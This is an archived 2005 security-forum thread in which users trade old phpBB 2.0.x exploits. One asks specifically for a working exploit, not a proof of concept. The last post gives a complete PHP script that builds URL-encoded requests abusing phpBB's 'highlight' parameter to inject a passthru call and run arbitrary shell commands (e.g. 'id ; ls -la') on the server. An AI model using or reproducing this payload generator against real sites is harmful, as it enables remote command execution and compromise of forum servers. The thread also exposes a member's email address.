Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
September 20, 2019
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 219
Members: 0
Total: 219
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> phpbb 2.0.4 or 2.0.3 anybody got....
Post new topic  Reply to topic View previous topic :: View next topic 
phpbb 2.0.4 or 2.0.3 anybody got....
PostPosted: Fri Mar 18, 2005 11:28 am Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




Anbody got an old 2.0.3 or 2.0.4 exploit sitting around amongst those piles of exploits? I dont really feel like looking through mountains of archives and Databases so Ill just ask the good(cough) people of Waraxe.us Razz

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Sat Mar 19, 2005 12:26 pm Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




i have !!!

phpbb 2.0.4 <-- use for test viewtopic.php and otehrs bug
give me an email , so i can send it to you

or u can donlod it form phpbb.sourceforge.net
<but i guest the packet allready patched>

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Mon Mar 21, 2005 5:05 am Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




FYI , the philes still leave unpatch

coz ive download the 2.0.11 for doin some testing

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Mon Mar 21, 2005 11:26 am Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




My email is shown in my profile but here it is anyway: zebcarnell@gmail.com Razz I need older ones because the sessions/cookies have been changed a lot since 2.0.3 and newer exploits dont work so well. I need some thing that isnt PERL or C++ and it cant be proof of concept. Ive tried the highlighter issue but that doesnt work either. If you can help it would be great.

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Mon Mar 21, 2005 2:09 pm Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




shai-tan wrote:
My email is shown in my profile but here it is anyway: zebcarnell@gmail.com Razz I need older ones because the sessions/cookies have been changed a lot since 2.0.3 and newer exploits dont work so well. I need some thing that isnt PERL or C++ and it cant be proof of concept. Ive tried the highlighter issue but that doesnt work either. If you can help it would be great.


ok,
btw i wrote some paper about highlighter , you can check it at http://geocities.com/paperecho/phpbbworm-eng.pdf

i hope i can email it to you.
coz my b/w its so small ..
FYI im using GPRS Smile

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Tue Mar 22, 2005 12:15 pm Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




Ill download it.
But Highlighter doesnt work with a SQL 2000 db as far as Im aware.
Thats why I need someone to did up an old xploit they might have that works.
Thanks though Wink [/u]

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Tue Mar 22, 2005 2:11 pm Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




yupe. ive allready sent the phpbb 2.0.4 to your email , cek it
hope u enjoy it :LOL:

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Wed Mar 23, 2005 10:04 am Reply with quote
shai-tan
Valuable expert
Valuable expert
 
Joined: Feb 22, 2005
Posts: 477




Yeah thanks man....
Its kinda hard to find reliable old exploits around these days

_________________
Shai-tan

?In short: just say NO TO DRUGS, and maybe you won?t end up like the Hurd people.? -- Linus Torvalds
View user's profile Send private message
PostPosted: Wed Mar 23, 2005 3:24 pm Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




shai-tan wrote:
Yeah thanks man....
Its kinda hard to find reliable old exploits around these days


NOPE .. hope it helpz you much

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
Passing Spaces
PostPosted: Tue Apr 05, 2005 4:19 pm Reply with quote
kingspice
Beginner
Beginner
 
Joined: Apr 05, 2005
Posts: 2




y3dips, just dropped u a pm.

Problem is I, can't seem to work out how to pass spaces
e.g uname -a
Anybody able to do so?

Ta
Kingspice
View user's profile Send private message
Re: Passing Spaces
PostPosted: Wed Apr 06, 2005 6:13 am Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




kingspice wrote:
y3dips, just dropped u a pm.

Problem is I, can't seem to work out how to pass spaces
e.g uname -a
Anybody able to do so?

Ta
Kingspice


ive allready read your pm. n i answer it too.
by the way, paperthat i wrote just some POC,
so if u need some space or a long command, u cant use RUSH security team php script to generate it , coz it used another variable included

Code:
<?
$rush='id ; ls -la'; //do what
$highlight='passthru($HTTP_GET_VARS[rush])'; // dont touch

print "?t=%37&rush=";

for ($i=0; $i<strlen($rush); ++$i) {
 print '%' . bin2hex(substr($rush,$i,1));
}

print "&highlight=%2527.";

for ($i=0; $i<strlen($highlight); ++$i) {
print '%' . bin2hex(substr($highlight,$i,1));
}

print ".%2527";
?>


see "rush" variable ?
thats the key

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
phpbb 2.0.4 or 2.0.3 anybody got....
  www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.090 Seconds